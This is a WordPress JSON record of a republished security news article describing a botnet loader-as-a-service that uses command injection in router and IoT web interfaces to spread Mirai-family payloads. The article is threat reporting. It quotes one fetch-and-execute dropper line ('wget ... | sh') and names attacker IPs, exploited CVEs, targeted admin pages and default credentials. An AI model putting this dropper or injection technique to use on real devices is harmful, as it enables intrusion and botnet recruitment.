{"id":7263,"date":"2025-09-28T10:03:34","date_gmt":"2025-09-28T10:03:34","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/09\/28\/new-botnet-loader-as-a-service-exploiting-routers-and-iot-devices-to-deploy-mirai-payloads\/"},"modified":"2025-09-28T10:03:34","modified_gmt":"2025-09-28T10:03:34","slug":"new-botnet-loader-as-a-service-exploiting-routers-and-iot-devices-to-deploy-mirai-payloads","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/09\/28\/new-botnet-loader-as-a-service-exploiting-routers-and-iot-devices-to-deploy-mirai-payloads\/","title":{"rendered":"New Botnet Loader-as-a-Service Exploiting Routers and IoT Devices to Deploy Mirai Payloads"},"content":{"rendered":"<p>    New Botnet Loader-as-a-Service Exploiting Routers and IoT Devices to Deploy Mirai Payloads<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>A sophisticated botnet operation has emerged, employing a Loader-as-a-Service model to systematically weaponize internet-connected devices across the globe.<\/p>\n<p>The campaign exploits SOHO routers, IoT devices, and enterprise applications through command injection vulnerabilities in web interfaces, demonstrating an alarming evolution in cybercriminal tactics.<\/p>\n<p>The malicious infrastructure operates by targeting unsanitized POST parameters in network management fields including NTP, syslog, and hostname configurations.<\/p>\n<p>Attackers inject shell commands into these vulnerable input fields, enabling <a href=\"https:\/\/cybersecuritynews.com\/chrome-remote-code-execution-vulnerability\/\" target=\"_blank\" rel=\"noreferrer noopener\">remote execution<\/a> through minimal one-line droppers such as <code>wget -qO- http:\/\/IP\/rondo.*.sh | sh<\/code>.<\/p>\n<p>This approach maximizes success rates across diverse device architectures while maintaining operational stealth.<\/p>\n<p>The botnet systematically progresses through multiple attack phases, beginning with automated authentication probes using default credentials like admin:admin combinations.<\/p>\n<p>Upon successful access, the operation deploys fetch-and-execute chains that download RondoDoX, Mirai, and Morte payloads from distributed command infrastructure spanning multiple IP addresses including 74.194.191.52, 83.252.42.112, and 196.251.73.24.<\/p>\n<p>CloudSEK analysts <a href=\"https:\/\/www.cloudsek.com\/blog\/botnet-loader-as-a-service-infrastructure-distributing-rondodox-and-mirai-payloads\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">identified<\/a> this campaign through exposed command and control logs spanning six months of operations.<\/p>\n<p>The security firm\u2019s TRIAD platform discovered logger panels containing detailed attack vectors and infrastructure deployment patterns, providing unprecedented visibility into the botnet\u2019s operational methodology.<\/p>\n<p>The malware demonstrates remarkable adaptability through multi-architecture payload support, utilizing BusyBox utilities for cross-platform compatibility.<\/p>\n<p>The operation targets Oracle WebLogic servers, embedded Linux systems, and specific router administration interfaces including wlwps.htm and wan_dyna.html pages.<\/p>\n<p>Additionally, the <a href=\"https:\/\/cybersecuritynews.com\/new-russian-disinformation-campaign\/\" target=\"_blank\" rel=\"noreferrer noopener\">campaign<\/a> exploits known CVEs including CVE-2019-17574 (WordPress Popup Maker), CVE-2019-16759 (vBulletin pre-auth RCE), and CVE-2012-1823 (PHP-CGI query string handling).<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-command-injection-attack-mechanism\"><strong>Command Injection Attack Mechanism<\/strong><\/h2>\n<p>The botnet\u2019s primary infiltration method centers on exploiting web GUI fields through sophisticated command injection techniques.<\/p>\n<p>The operation specifically targets network configuration parameters where administrators typically input server addresses and system settings.<\/p>\n<p>When devices process these malformed inputs without proper sanitization, the injected commands execute with system privileges.<\/p>\n<p>The attack chain utilizes multiple fallback protocols to ensure payload delivery success. If HTTP-based wget commands fail, the system automatically attempts TFTP and <a href=\"https:\/\/cybersecuritynews.com\/wing-ftp-server-vulnerability-exploited\/\" target=\"_blank\" rel=\"noreferrer noopener\">FTP<\/a> transfers using commands like ftpget and tftp.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRefGvTqTpnmFHJmZncIkYGQv_SJwuQJSCrlZyBWkI6BNYFzT-lnuBMcTrsoRnfQ_Bf5ITqjnt4TiQ_5KvjL727WddTwPWBR1G2eIynp90bBKOHuO8ahNrN6kvothSXZbrJeqrtn5RYLxmZDmAYzvj8ndJDy1y22ydKmBeH7rpyTBoKInh_MjVm5esh2M\/s16000\/Exploitation%2520of%2520Old%2520CVEs%2520%28Source%2520-%2520CloudSEK%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Exploitation of Old CVEs (Source \u2013 CloudSEK)<\/figcaption><\/figure>\n<\/div>\n<p>This redundancy, combined with hosting identical payloads across numerous IP addresses, creates a resilient distribution network that survives individual server takedowns.<\/p>\n<p>Post-compromise, the <a href=\"https:\/\/cybersecuritynews.com\/prometei-botnet-attacking-linux-servers\/\" target=\"_blank\" rel=\"noreferrer noopener\">botnet<\/a> conducts comprehensive device fingerprinting through ReplyDeviceInfo modules, collecting MAC addresses, hostnames, firmware versions, and available services.<\/p>\n<p>This reconnaissance determines which architecture-specific binaries to deploy and whether devices should be retained for cryptocurrency mining, <a href=\"https:\/\/cybersecuritynews.com\/1-5-gpps-ddos-attack\/\" target=\"_blank\" rel=\"noreferrer noopener\">DDoS<\/a> participation, or sold as access credentials to other threat actors.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 91%,rgb(169,184,195) 100%)\"><strong>Follow us on\u00a0<a href=\"https:\/\/news.google.com\/publications\/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google News<\/a>,\u00a0<a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">LinkedIn<\/a>,\u00a0and\u00a0<a href=\"https:\/\/x.com\/cyber_press_org\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0<strong>Set CSN as a Preferred Source in\u00a0<a href=\"https:\/\/www.google.com\/preferences\/source?q=cybersecuritynews.com\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google<\/a>.<\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/new-botnet-loader-as-a-service-exploiting-routers\/\">New Botnet Loader-as-a-Service Exploiting Routers and IoT Devices to Deploy Mirai Payloads<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/new-botnet-loader-as-a-service-exploiting-routers\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>New Botnet Loader-as-a-Service Exploiting Routers and IoT Devices to Deploy Mirai Payloads A sophisticated botnet operation has emerged, employing a Loader-as-a-Service model to systematically weaponize internet-connected devices across the globe. The campaign exploits SOHO routers, IoT devices, and enterprise applications through command injection vulnerabilities in web interfaces, demonstrating an alarming evolution in cybercriminal tactics. The [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-7263","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7263"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=7263"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7263\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=7263"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=7263"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=7263"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}